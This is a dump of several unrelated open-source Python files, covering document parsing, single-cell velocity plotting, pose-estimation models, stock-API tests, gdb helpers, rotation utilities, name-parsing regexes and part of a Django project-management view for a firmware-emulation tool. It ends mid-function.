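    print(minify_with_yuicompressor('bundle.js', retain_variable_names=True))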
|
pydocx/openxml/wordprocessing/level.py | botzill/pydocx | 127 | 11179198 |
# coding: utf-8
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
from pydocx.models import XmlModel, XmlChild, XmlAttribute
from pydocx.openxml.wordprocessing.run_properties import RunProperties
from pydocx.openxml.wordprocessing.paragraph_properties import ParagraphProperties # noqa
class Level(XmlModel):
XML_TAG = 'lvl'
level_id = XmlAttribute(name='ilvl')
start = XmlChild(attrname='val')
num_format = XmlChild(name='numFmt', attrname='val')
restart = XmlChild(name='lvlRestart', attrname='val')
paragraph_style = XmlChild(name='pStyle', attrname='val')
run_properties = XmlChild(type=RunProperties)
paragraph_properties = XmlChild(type=ParagraphProperties)
def is_bullet_format(self):
return self.num_format == 'bullet'
def format_is_none(self):
if not self.num_format:
return True
return self.num_format.lower() == 'none'
|
scvelo/plotting/velocity.py | WeilerP/scvelo | 272 | 11179230 |
import numpy as np
import pandas as pd
from scipy.sparse import issparse
import matplotlib.pyplot as pl
from matplotlib import rcParams
from scvelo.preprocessing.moments import second_order_moments
from scvelo.tools.rank_velocity_genes import rank_velocity_genes
from .scatter import scatter
from .utils import (
default_basis,
default_size,
get_basis,
get_figure_params,
savefig_or_show,
)
def velocity(
adata,
var_names=None,
basis=None,
vkey="velocity",
mode=None,
fits=None,
layers="all",
color=None,
color_map=None,
colorbar=True,
perc=[2, 98],
alpha=0.5,
size=None,
groupby=None,
groups=None,
legend_loc="none",
legend_fontsize=8,
use_raw=False,
fontsize=None,
figsize=None,
dpi=None,
show=None,
save=None,
ax=None,
ncols=None,
**kwargs,
):
"""Phase and velocity plot for set of genes.
The phase plot shows spliced against unspliced expressions with steady-state fit.
Further the embedding is shown colored by velocity and expression.
Arguments
---------
adata: :class:`~anndata.AnnData`
Annotated data matrix.
var_names: `str` or list of `str` (default: `None`)
Which variables to show.
basis: `str` (default: `'umap'`)
Key for embedding coordinates.
mode: `'stochastic'` or `None` (default: `None`)
        Whether to show the covariability phase portrait.
fits: `str` or list of `str` (default: `['velocity', 'dynamics']`)
Which steady-state estimates to show.
layers: `str` or list of `str` (default: `'all'`)
Which layers to show.
color: `str`, list of `str` or `None` (default: `None`)
Key for annotations of observations/cells or variables/genes
color_map: `str` or tuple (default: `['RdYlGn', 'gnuplot_r']`)
        String denoting a matplotlib color map. If a tuple is given, the first
        and second color maps correspond to velocity and expression, respectively.
perc: tuple, e.g. [2,98] (default: `[2,98]`)
Specify percentile for continuous coloring.
groups: `str`, `list` (default: `None`)
        Subset of groups, e.g. ['g1', 'g2'], to which the plot shall be restricted.
groupby: `str`, `list` or `np.ndarray` (default: `None`)
Key of observations grouping to consider.
legend_loc: str (default: 'none')
Location of legend, either 'on data', 'right margin'
or valid keywords for matplotlib.legend.
size: `float` (default: 5)
Point size.
alpha: `float` (default: 1)
Set blending - 0 transparent to 1 opaque.
fontsize: `float` (default: `None`)
Label font size.
figsize: tuple (default: `(7,5)`)
Figure size.
dpi: `int` (default: 80)
Figure dpi.
show: `bool`, optional (default: `None`)
Show the plot, do not return axis.
save: `bool` or `str`, optional (default: `None`)
If `True` or a `str`, save the figure. A string is appended to the default
filename. Infer the filetype if ending on {'.pdf', '.png', '.svg'}.
ax: `matplotlib.Axes`, optional (default: `None`)
A matplotlib axes object. Only works if plotting a single component.
ncols: `int` or `None` (default: `None`)
        Number of columns to arrange multiple plots into.
"""
basis = default_basis(adata) if basis is None else get_basis(adata, basis)
color, color_map = kwargs.pop("c", color), kwargs.pop("cmap", color_map)
if fits is None:
fits = ["velocity", "dynamics"]
if color_map is None:
color_map = ["RdYlGn", "gnuplot_r"]
if isinstance(groupby, str) and groupby in adata.obs.keys():
if (
"rank_velocity_genes" not in adata.uns.keys()
or adata.uns["rank_velocity_genes"]["params"]["groupby"] != groupby
):
rank_velocity_genes(adata, vkey=vkey, n_genes=10, groupby=groupby)
names = np.array(adata.uns["rank_velocity_genes"]["names"].tolist())
if groups is None:
var_names = names[:, 0]
else:
groups = [groups] if isinstance(groups, str) else groups
categories = adata.obs[groupby].cat.categories
idx = np.array([any([g in group for g in groups]) for group in categories])
var_names = np.hstack(names[idx, : int(10 / idx.sum())])
elif var_names is not None:
if isinstance(var_names, str):
var_names = [var_names]
else:
var_names = [var for var in var_names if var in adata.var_names]
else:
raise ValueError("No var_names or groups specified.")
var_names = pd.unique(var_names)
if use_raw or "Ms" not in adata.layers.keys():
skey, ukey = "spliced", "unspliced"
else:
skey, ukey = "Ms", "Mu"
layers = [vkey, skey] if layers == "all" else layers
layers = [layer for layer in layers if layer in adata.layers.keys() or layer == "X"]
fits = list(adata.layers.keys()) if fits == "all" else fits
fits = [fit for fit in fits if f"{fit}_gamma" in adata.var.keys()] + ["dynamics"]
stochastic_fits = [fit for fit in fits if f"variance_{fit}" in adata.layers.keys()]
nplts = 1 + len(layers) + (mode == "stochastic") * 2
ncols = 1 if ncols is None else ncols
nrows = int(np.ceil(len(var_names) / ncols))
ncols = int(ncols * nplts)
figsize = rcParams["figure.figsize"] if figsize is None else figsize
figsize, dpi = get_figure_params(figsize, dpi, ncols / 2)
if ax is None:
gs_figsize = (figsize[0] * ncols / 2, figsize[1] * nrows / 2)
ax = pl.figure(figsize=gs_figsize, dpi=dpi)
gs = pl.GridSpec(nrows, ncols, wspace=0.5, hspace=0.8)
# half size, since fontsize is halved in width and height
size = default_size(adata) / 2 if size is None else size
fontsize = rcParams["font.size"] * 0.8 if fontsize is None else fontsize
scatter_kwargs = dict(colorbar=colorbar, perc=perc, size=size, use_raw=use_raw)
scatter_kwargs.update(dict(fontsize=fontsize, legend_fontsize=legend_fontsize))
for v, var in enumerate(var_names):
_adata = adata[:, var]
s, u = _adata.layers[skey], _adata.layers[ukey]
if issparse(s):
s, u = s.A, u.A
# spliced/unspliced phase portrait with steady-state estimate
ax = pl.subplot(gs[v * nplts])
cmap = color_map
if isinstance(color_map, (list, tuple)):
cmap = color_map[-1] if color in ["X", skey] else color_map[0]
if "xlabel" not in kwargs:
kwargs["xlabel"] = "spliced"
if "ylabel" not in kwargs:
kwargs["ylabel"] = "unspliced"
legend_loc_lines = "none" if v < len(var_names) - 1 else legend_loc
scatter(
adata,
basis=var,
color=color,
color_map=cmap,
frameon=True,
title=var,
alpha=alpha,
vkey=fits,
show=False,
ax=ax,
save=False,
legend_loc_lines=legend_loc_lines,
**scatter_kwargs,
**kwargs,
)
# velocity and expression plots
for layer_id, layer in enumerate(layers):
ax = pl.subplot(gs[v * nplts + layer_id + 1])
title = "expression" if layer in ["X", skey] else layer
# _kwargs = {} if title == 'expression' else kwargs
cmap = color_map
if isinstance(color_map, (list, tuple)):
cmap = color_map[-1] if layer in ["X", skey] else color_map[0]
scatter(
adata,
basis=basis,
color=var,
layer=layer,
title=title,
color_map=cmap,
alpha=alpha,
frameon=False,
show=False,
ax=ax,
save=False,
**scatter_kwargs,
**kwargs,
)
if mode == "stochastic":
ss, us = second_order_moments(_adata)
s, u, ss, us = s.flatten(), u.flatten(), ss.flatten(), us.flatten()
fit = stochastic_fits[0]
ax = pl.subplot(gs[v * nplts + len(layers) + 1])
beta, offset = 1, 0
if f"{fit}_beta" in adata.var.keys():
beta = _adata.var[f"{fit}_beta"]
if f"{fit}_offset" in adata.var.keys():
offset = _adata.var[f"{fit}_offset"]
x = np.array(2 * (ss - s ** 2) - s)
y = np.array(2 * (us - u * s) + u + 2 * s * offset / beta)
kwargs["xlabel"] = r"2 $\Sigma_s - \langle s \rangle$"
kwargs["ylabel"] = r"2 $\Sigma_{us} + \langle u \rangle$"
scatter(
adata,
x=x,
y=y,
color=color,
title=var,
frameon=True,
ax=ax,
save=False,
show=False,
**scatter_kwargs,
**kwargs,
)
xnew = np.linspace(np.min(x), np.max(x) * 1.02)
for fit in stochastic_fits:
gamma, beta, offset2 = 1, 1, 0
if f"{fit}_gamma" in adata.var.keys():
gamma = _adata.var[f"{fit}_gamma"].values
if f"{fit}_beta" in adata.var.keys():
beta = _adata.var[f"{fit}_beta"].values
if f"{fit}_offset2" in adata.var.keys():
offset2 = _adata.var[f"{fit}_offset2"].values
ynew = gamma / beta * xnew + offset2 / beta
pl.plot(xnew, ynew, c="k", linestyle="--")
savefig_or_show(dpi=dpi, save=save, show=show)
if show is False:
return ax
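# A hedged usage sketch mirroring the scVelo tutorials; the dataset and gene
# name are assumptions.
if __name__ == "__main__":
    import scvelo as scv
    adata = scv.datasets.pancreas()
    scv.pp.filter_and_normalize(adata)
    scv.pp.moments(adata)
    scv.tl.velocity(adata)
    velocity(adata, var_names=["Cpe"], basis="umap", ncols=1)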
|
cosypose/training/pose_models_cfg.py | ompugao/cosypose | 202 | 11179241 | # Backbones
from cosypose.models.efficientnet import EfficientNet
from cosypose.models.wide_resnet import WideResNet18, WideResNet34
from cosypose.models.flownet import flownet_pretrained
# Pose models
from cosypose.models.pose import PosePredictor
from cosypose.utils.logging import get_logger
logger = get_logger(__name__)
def check_update_config(config):
if not hasattr(config, 'init_method'):
config.init_method = 'v0'
return config
def create_model_pose(cfg, renderer, mesh_db):
n_inputs = 6
backbone_str = cfg.backbone_str
if backbone_str == 'efficientnet-b3':
backbone = EfficientNet.from_name('efficientnet-b3', in_channels=n_inputs)
backbone.n_features = 1536
elif backbone_str == 'flownet':
backbone = flownet_pretrained(n_inputs=n_inputs)
backbone.n_features = 1024
elif 'resnet34' in backbone_str:
backbone = WideResNet34(n_inputs=n_inputs)
elif 'resnet18' in backbone_str:
backbone = WideResNet18(n_inputs=n_inputs)
else:
raise ValueError('Unknown backbone', backbone_str)
pose_dim = cfg.n_pose_dims
logger.info(f'Backbone: {backbone_str}')
backbone.n_inputs = n_inputs
render_size = (240, 320)
model = PosePredictor(backbone=backbone,
renderer=renderer,
mesh_db=mesh_db,
render_size=render_size,
pose_dim=pose_dim)
return model
def create_model_refiner(cfg, renderer, mesh_db):
return create_model_pose(cfg, renderer, mesh_db)
def create_model_coarse(cfg, renderer, mesh_db):
return create_model_pose(cfg, renderer, mesh_db)
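# A minimal sketch of the cfg object this factory expects; only the two
# attributes read above are set, and the renderer/mesh_db arguments are
# placeholders to be supplied by the caller.
if __name__ == '__main__':
    from types import SimpleNamespace
    cfg = SimpleNamespace(backbone_str='efficientnet-b3', n_pose_dims=9)
    # model = create_model_pose(cfg, renderer=my_renderer, mesh_db=my_mesh_db)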
|
iexfinance/tests/stocks/test_field_methods.py | jto-d/iexfinance | 653 | 11179253 |
import numpy as np
import pandas as pd
import pytest
from iexfinance.stocks import Stock
from iexfinance.utils.exceptions import IEXQueryError
class TestFieldMethod(object):
def setup_class(self):
self.a = Stock("AAPL")
self.b = Stock(["AAPL", "TSLA"])
self.c = Stock("BADSYMBOL")
self.d = Stock(["AAPL", "BADSYMBOL"])
self.aj = Stock("AAPL", output_format="json")
def test_get_field_single_bad_symbol(self):
with pytest.raises(IEXQueryError):
self.c._get_field("company", "exchange")
def test_get_field_batch_bad_symbol(self):
data = self.d._get_field("company", "exchange")
assert isinstance(data, pd.DataFrame)
assert "AAPL" in data.index
assert "BADSYMBOL" not in data.index
def test_get_bad_field(self):
with pytest.raises(KeyError):
self.a._get_field("company", "BADFIELD")
with pytest.raises(KeyError):
self.b._get_field("company", "BADFIELD")
with pytest.raises(KeyError):
self.aj._get_field("company", "BADFIELD")
def test_get_bad_endpoint(self):
with pytest.raises(NotImplementedError):
self.a._get_field("BADFIELD", "NULL")
with pytest.raises(NotImplementedError):
self.b._get_field("BADFIELD", "NULL")
with pytest.raises(NotImplementedError):
self.aj._get_field("BADFIELD", "NULL")
class TestFieldMethods(object):
def setup_class(self):
self.a = Stock("AAPL")
self.b = Stock(["AAPL", "TSLA"])
def test_company_name(self):
data = self.a.get_company_name()
assert isinstance(data, str)
assert data == "Apple Inc"
def test_primary_exchange(self):
data = self.a.get_primary_exchange()
assert isinstance(data, str)
assert len(data) == 33
def test_sector(self):
data = self.a.get_sector()
assert isinstance(data, str)
assert len(data) == 13
def test_open(self):
data = self.a.get_open()
assert isinstance(data, np.float64)
def test_close(self):
data = self.a.get_close()
assert isinstance(data, np.float64)
def test_years_high(self):
data = self.a.get_years_high()
assert isinstance(data, np.float64)
def test_years_low(self):
data = self.a.get_years_low()
assert isinstance(data, np.float64)
def test_ytd_change(self):
data = self.a.get_ytd_change()
assert isinstance(data, np.float64)
def test_volume(self):
data = self.a.get_volume()
assert isinstance(data, np.int64)
def test_market_cap(self):
data = self.a.get_market_cap()
assert isinstance(data, np.int64)
def test_beta(self):
data = self.a.get_beta()
assert isinstance(data, np.float64)
def test_shares_outstanding(self):
data = self.a.get_shares_outstanding()
assert isinstance(data, np.int64)
def test_float(self):
data = self.a.get_float()
assert isinstance(data, np.int64)
|
secure/__init__.py | sesh/secure | 247 | 11179303 | from secure.headers import CacheControl as CacheControl
from secure.headers import ContentSecurityPolicy as ContentSecurityPolicy
from secure.headers import PermissionsPolicy as PermissionsPolicy
from secure.headers import ReferrerPolicy as ReferrerPolicy
from secure.headers import ReportTo as ReportTo
from secure.headers import Server as Server
from secure.headers import StrictTransportSecurity as StrictTransportSecurity
from secure.headers import XContentTypeOptions as XContentTypeOptions
from secure.headers import XFrameOptions as XFrameOptions
from secure.headers import XXSSProtection as XXSSProtection
from secure.secure import Secure as Secure
|
other/gdb_scripts/get_cmds.py | CyberFlameGO/tilck | 1,059 | 11179309 | # SPDX-License-Identifier: BSD-2-Clause
import gdb # pylint: disable=import-error
from . import base_utils as bu
from . import tilck_types as tt
from . import tasks
class cmd_get_task(gdb.Command):
cmd_name = "get-task"
def __init__(self):
super(cmd_get_task, self).__init__(
cmd_get_task.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Usage: get-task <tid>")
def invoke(self, arg, from_tty):
try:
tid = int(arg)
except:
self.show_usage()
return
task = tasks.get_task(tid)
if not task:
print("No such task")
return
gdb.execute("print *(struct task *){}".format(int(task)))
class cmd_get_proc(gdb.Command):
cmd_name = "get-proc"
def __init__(self):
super(cmd_get_proc, self).__init__(
cmd_get_proc.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-proc <pid>")
def invoke(self, arg, from_tty):
try:
pid = int(arg)
except:
self.show_usage()
return
proc = tasks.get_proc(pid)
if not proc:
print("No such process")
return
gdb.execute("print *(struct process *){}".format(int(proc)))
class cmd_get_handle2(gdb.Command):
cmd_name = "get-handle2"
def __init__(self):
super(cmd_get_handle2, self).__init__(
cmd_get_handle2.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-handle2 <pid> <handle_number>")
def invoke(self, arg, from_tty):
try:
pid, hn = arg.split(" ")
pid = int(pid)
hn = int(hn)
except:
self.show_usage()
return
proc = tasks.get_proc(pid)
if not proc:
print("No such process")
return
handle = tasks.get_handle(proc, hn)
if not handle:
print("No such handle")
return
gdb.execute("print *(struct fs_handle_base *){}".format(int(handle)))
class cmd_get_handle(gdb.Command):
cmd_name = "get-handle"
def __init__(self):
super(cmd_get_handle, self).__init__(
cmd_get_handle.cmd_name,
gdb.COMMAND_USER
)
def show_usage(self):
print("Use: get-handle <handle_number> # assuming the current process")
def invoke(self, arg, from_tty):
try:
hn = int(arg)
except:
self.show_usage()
return
curr = gdb.parse_and_eval("__current->pi")
handle = tasks.get_handle(curr, hn)
if not handle:
print("No such handle")
return
gdb.execute("print *(struct fs_handle_base *){}".format(int(handle)))
class cmd_get_curr(gdb.Command):
cmd_name = "get-curr"
def __init__(self):
super(cmd_get_curr, self).__init__(
cmd_get_curr.cmd_name,
gdb.COMMAND_USER
)
def invoke(self, arg, from_tty):
gdb.execute("print *__current")
class cmd_get_currp(gdb.Command):
cmd_name = "get-currp"
def __init__(self):
super(cmd_get_currp, self).__init__(
cmd_get_currp.cmd_name,
gdb.COMMAND_USER
)
def invoke(self, arg, from_tty):
gdb.execute("print *__current->pi")
# ------------------------------------------------------
bu.register_new_custom_gdb_cmd(cmd_get_task)
bu.register_new_custom_gdb_cmd(cmd_get_proc)
bu.register_new_custom_gdb_cmd(cmd_get_handle2)
bu.register_new_custom_gdb_cmd(cmd_get_handle)
bu.register_new_custom_gdb_cmd(cmd_get_curr)
bu.register_new_custom_gdb_cmd(cmd_get_currp)
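# Illustrative gdb session (added comment; the tid/pid values are hypothetical):
#   (gdb) get-task 1          # dump `struct task` for tid 1
#   (gdb) get-proc 1          # dump `struct process` for pid 1
#   (gdb) get-handle2 1 0     # dump handle 0 of pid 1
#   (gdb) get-curr            # dump the current task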
|
challenges/4.E.Max_Value/main.py | pradeepsaiu/python-coding-challenges | 141 | 11179340 | numbers = [8, 2, 4, 3, 6, 5, 9, 1]
### Modify the code below ###
highest = max(numbers)
### Modify the code above ###
print(highest)
|
guild/tests/samples/projects/hparam-summaries/echo.py | wheatdog/guildai | 694 | 11179341 | x_flag = None
print("x_metric: %s" % x_flag)
|
util.py | WangYueFt/prnet | 105 | 11179362 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from scipy.spatial.transform import Rotation
def euler2mat(angle):
"""
convert euler angles [B, 3] to rotation matrix, reference: https://github.com/ClementPinard/SfmLearner-Pytorch/blob/master/inverse_warp.py
:param angle: rx, ry, rz [B, 3]
:return: rotation matrix [B, 3, 3]
"""
B = angle.size(0)
x, y, z = angle[:,0], angle[:,1], angle[:,2]
cosz = torch.cos(z)
sinz = torch.sin(z)
zeros = z.detach()*0
ones = zeros.detach()+1
zmat = torch.stack([cosz, -sinz, zeros,
sinz, cosz, zeros,
zeros, zeros, ones], dim=1).reshape(B, 3, 3)
cosy = torch.cos(y)
siny = torch.sin(y)
ymat = torch.stack([cosy, zeros, siny,
zeros, ones, zeros,
-siny, zeros, cosy], dim=1).reshape(B, 3, 3)
cosx = torch.cos(x)
sinx = torch.sin(x)
xmat = torch.stack([ones, zeros, zeros,
zeros, cosx, -sinx,
zeros, sinx, cosx], dim=1).reshape(B, 3, 3)
rotMat = xmat @ ymat @ zmat
return rotMat
def quat2mat(quat):
"""
    convert quaternion to rotation matrix ([x, y, z, w] ordering, to follow scipy)
    :param quat: quaternion [B, 4]
:return: rotation matrix [B, 3, 3]
"""
# norm_quat = torch.cat([quat[:, :1].detach()*0 + 1, quat], dim=1)
# norm_quat = norm_quat/norm_quat.norm(p=2, dim=1, keepdim=True)
# w, x, y, z = norm_quat[:,0], norm_quat[:,1], norm_quat[:,2], norm_quat[:,3]
x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.stack([w2 + x2 - y2 - z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, w2 - x2 + y2 - z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, w2 - x2 - y2 + z2], dim=1).reshape(B, 3, 3)
return rotMat
def pose_vec2mat(vec, rotation_mode='euler'):
"""
:param vec: tx, ty, tz, rx, ry, rz [B, 6]
:param rotation_mode: 'euler' or 'quat'
:return: rotation matrix [B, 3, 3] and translation matrix [B, 3, 1]
"""
translation_mat = vec[:, :3].unsqueeze(-1) # [B, 3, 1]
rot = vec[:, 3:]
if rotation_mode == 'euler':
rot_mat = euler2mat(rot) # [B, 3, 3]
elif rotation_mode == 'quat':
rot_mat = quat2mat(rot) # [B, 3, 3]
return rot_mat, translation_mat
def mat2euler(rot_mat, seq='xyz'):
"""
convert rotation matrix to euler angle
:param rot_mat: rotation matrix rx*ry*rz [B, 3, 3]
:param seq: seq is xyz(rotate along z first) or zyx
:return: three angles, x, y, z
"""
r11 = rot_mat[:, 0, 0]
r12 = rot_mat[:, 0, 1]
r13 = rot_mat[:, 0, 2]
r21 = rot_mat[:, 1, 0]
r22 = rot_mat[:, 1, 1]
r23 = rot_mat[:, 1, 2]
r31 = rot_mat[:, 2, 0]
r32 = rot_mat[:, 2, 1]
r33 = rot_mat[:, 2, 2]
if seq == 'xyz':
z = torch.atan2(-r12, r11)
y = torch.asin(r13)
x = torch.atan2(-r23, r33)
else:
y = torch.asin(-r31)
x = torch.atan2(r32, r33)
z = torch.atan2(r21, r11)
return torch.stack((x, y, z), dim=1)
def mat2quat(rot_mat, seq='xyz'):
    """
    convert rotation matrix to quaternion ([x, y, z, w] to follow scipy)
    :param rot_mat: rotation matrix [B, 3, 3]
    :return: quaternion [B, 4], ordered [x, y, z, w]
    """
    # Minimal sketch replacing the original stub. Assumes the rotation angle
    # is below pi (trace > -1), where the simple trace formula is stable.
    trace = rot_mat[:, 0, 0] + rot_mat[:, 1, 1] + rot_mat[:, 2, 2]
    w = torch.sqrt(torch.clamp(1.0 + trace, min=1e-8)) / 2.0
    x = (rot_mat[:, 2, 1] - rot_mat[:, 1, 2]) / (4.0 * w)
    y = (rot_mat[:, 0, 2] - rot_mat[:, 2, 0]) / (4.0 * w)
    z = (rot_mat[:, 1, 0] - rot_mat[:, 0, 1]) / (4.0 * w)
    return torch.stack((x, y, z, w), dim=1)
def mat2pose_vec(rot_mat, translation_mat, rotation_mode='euler', seq='xyz'):
    """
    Convert rotation matrix and translation matrix to 6DoF
    :param rot_mat: [B, 3, 3]
    :param translation_mat: [B, 3, 1]
    :param rotation_mode: 'euler' or 'quat'
    :param seq: 'xyz'(rotate along z first) or 'zyx'
    :return: pose_vec - tx, ty, tz, rx, ry, rz [B, 6]
    """
    # Minimal sketch replacing the original stub.
    translation = translation_mat.squeeze(-1)  # [B, 3]
    if rotation_mode == 'euler':
        rot = mat2euler(rot_mat, seq=seq)
    else:
        # first three quaternion entries; w is recoverable up to sign from |q| = 1
        rot = mat2quat(rot_mat, seq=seq)[:, :3]
    return torch.cat((translation, rot), dim=1)
def transform_point_cloud(point_cloud, rotation, translation):
"""
:param point_cloud: [B, 3, N]
:param rotation: Euler angel [B, 3]
:param translation: Translation [B, 3]
:return:
"""
if len(rotation.size()) == 2:
rot_mat = quat2mat(rotation)
else:
rot_mat = rotation
return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
eulers = []
for i in range(mats.shape[0]):
r = Rotation.from_dcm(mats[i])
eulers.append(r.as_euler(seq, degrees=True))
return np.asarray(eulers, dtype='float32')
if __name__ == '__main__':
print('hello world')
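    # Added round-trip sanity sketch: for angles in the principal range,
    # mat2euler(euler2mat(a), seq='xyz') should recover a up to float precision.
    angles = torch.tensor([[0.1, -0.2, 0.3]])
    recovered = mat2euler(euler2mat(angles), seq='xyz')
    print(angles, recovered)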
|
modules/nameparser/config/regexes.py | whanderley/eden | 205 | 11179396 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
# emoji regex from https://stackoverflow.com/questions/26568722/remove-unicode-emoji-using-re-in-python
try:
# Wide UCS-4 build
re_emoji = re.compile('['
'\U0001F300-\U0001F64F'
'\U0001F680-\U0001F6FF'
'\u2600-\u26FF\u2700-\u27BF]+',
re.UNICODE)
except re.error:
# Narrow UCS-2 build
re_emoji = re.compile('('
'\ud83c[\udf00-\udfff]|'
'\ud83d[\udc00-\ude4f\ude80-\udeff]|'
'[\u2600-\u26FF\u2700-\u27BF])+',
re.UNICODE)
REGEXES = set([
("spaces", re.compile(r"\s+", re.U)),
("word", re.compile(r"(\w|\.)+", re.U)),
("mac", re.compile(r'^(ma?c)(\w+)', re.I | re.U)),
("initial", re.compile(r'^(\w\.|[A-Z])?$', re.U)),
("nickname", re.compile(r'\s*?[\("](.+?)[\)"]', re.U)),
("roman_numeral", re.compile(r'^(X|IX|IV|V?I{0,3})$', re.I | re.U)),
("no_vowels",re.compile(r'^[^aeyiuo]+$', re.I | re.U)),
("period_not_at_end",re.compile(r'.*\..+$', re.I | re.U)),
("emoji",re_emoji),
])
"""
All regular expressions used by the parser are precompiled and stored in the config.
"""
|
frankensteinWebUI/views.py | ParikhKadam/frankenstein | 344 | 11179433 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.utils.http import urlencode
from django import forms
import os
import json
import glob
import hashlib
from binascii import hexlify, unhexlify
import traceback
from core.project import Project #TODO rename
#TODO move to forms.py
class projectNameForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x])
class editConfigForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
toolchain = forms.CharField(max_length=100, help_text='Toolchain', validators=[lambda x: not x])
emulationCFlags = forms.CharField(max_length=1000, help_text='emulationCFlags', validators=[lambda x: not x])
emulationCodeBase = forms.CharField(help_text="emulationCodeBase", validators=[lambda x: not int(x,16)])
patchCFlags = forms.CharField(max_length=1000, help_text='patchCFlags', validators=[lambda x: not x])
patchCodeBase = forms.CharField(help_text="patchCodeBase", validators=[lambda x: not int(x,16)])
class editGroupForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldGroupName = forms.CharField(max_length=100, help_text='Old Group Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='New Group Name', validators=[lambda x: not x])
active = forms.BooleanField(help_text="Is Segment Active", required=False)
class editSegmentForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldSegmentName = forms.CharField(max_length=100, help_text='Old Segment Name', validators=[lambda x: not x])
oldGroupName = forms.CharField(max_length=100, help_text='Old Group Name', validators=[lambda x: not x])
newSegmentName = forms.CharField(max_length=100, help_text='New Segment Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='New Group Name', validators=[lambda x: not x])
addr = forms.CharField(help_text="Segment Address", validators=[lambda x: not int(x,16)])
active = forms.BooleanField(help_text="Is Segment Active", required=False)
class editSymbolForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
oldSymbolName = forms.CharField(max_length=100, validators=[lambda x: not x], widget=forms.HiddenInput())
oldGroupName = forms.CharField(max_length=100, validators=[lambda x: not x], widget=forms.HiddenInput())
newSymbolName = forms.CharField(max_length=100, help_text='Symbol Name', validators=[lambda x: not x])
newGroupName = forms.CharField(max_length=100, help_text='Group Name', validators=[lambda x: not x])
value = forms.CharField(help_text="Value", validators=[lambda x: not int(x,16)])
class loadSegmentForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
segment = forms.FileField(help_text='File', validators=[lambda x: not x])
addr = forms.CharField(help_text="Segment Address", validators=[lambda x: not int(x,16)])
groupName = forms.CharField(max_length=100, help_text='Segment Group', validators=[lambda x: not x])
class loadELFForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
elf = forms.FileField(help_text='File', validators=[lambda x: not x])
loadSymbols = forms.BooleanField(help_text="Load Symbols", required=False, initial=True)
loadSegments = forms.BooleanField(help_text="Load Segments", required=False, initial=True)
groupName = forms.CharField(max_length=100, help_text='Segment Group', validators=[lambda x: not x])
class loadIdbForm(forms.Form):
projectName = forms.CharField(max_length=100, help_text='Project Name', validators=[lambda x: not x], widget=forms.HiddenInput())
idb = forms.FileField(help_text='File', validators=[lambda x: not x])
loadFunctions = forms.BooleanField(help_text="Load Functions", required=False, initial=True)
loadSegments = forms.BooleanField(help_text="Load Segments", required=False, initial=True)
def render_wrapper(request, template, context={}):
projects = glob.glob("projects/*/project.json")
projects = map(lambda x: os.path.basename(os.path.dirname(x)), projects)
context["projects"] = {}
for projectName in projects:
emulators = glob.glob(getProjectPath(projectName)+"/gen/*.exe")
context["projects"][projectName] = map(os.path.basename, emulators)
if "title" not in context:
context["title"] = "Frankenstein"
return render(request, template, context)
"""
Project Management
"""
def getProjectPath(projectName):
return "projects/"+os.path.basename(projectName)
def getProjectByName(projectName):
projectPath = "projects/"+os.path.basename(projectName)
return Project(projectPath)
def index(request):
return render_wrapper(request, 'index.html')
def project(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
return redirect("/")
project = getProjectByName(projectName)
patches = glob.glob(getProjectPath(projectName)+"/gen/*.patch")
patches = map(os.path.basename, patches)
context = {
"title": projectName,
"projectName": projectName,
"project": project,
"patches": patches,
}
context['projectNameForm'] = projectNameForm({"projectName": projectName})
context['editSegmentForm'] = editSegmentForm({"projectName": projectName})
context['loadSegmentForm'] = loadSegmentForm({"projectName": projectName})
context['loadELFForm'] = loadELFForm({"projectName": projectName})
context['loadIdbForm'] = loadIdbForm({"projectName": projectName})
return render_wrapper(request, 'project.html', context)
def newProject(request):
if request.method == 'POST':
form = projectNameForm(request.POST)
if form.is_valid():
project = getProjectByName(form.cleaned_data["projectName"])
project.save()
return redirect("/")
else:
form = projectNameForm()
context = {}
context['projectNameForm'] = form
return render_wrapper(request, 'project/newProject.html', context)
def getProjectCfg(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
redirect("/")
project = getProjectByName(projectName)
return HttpResponse(json.dumps(project.cfg))
def projectSanityCheck(request):
projectName = request.GET["projectName"]
if not os.path.isfile("projects/%s/project.json" % projectName):
redirect("/")
try:
project = getProjectByName(projectName)
project.sanity_check()
return HttpResponse(project.error_msgs)
except:
return HttpResponse(traceback.format_exc())
"""
Config/Group/Segment/Symbol Management
"""
def editConfig(request):
if request.method == 'POST':
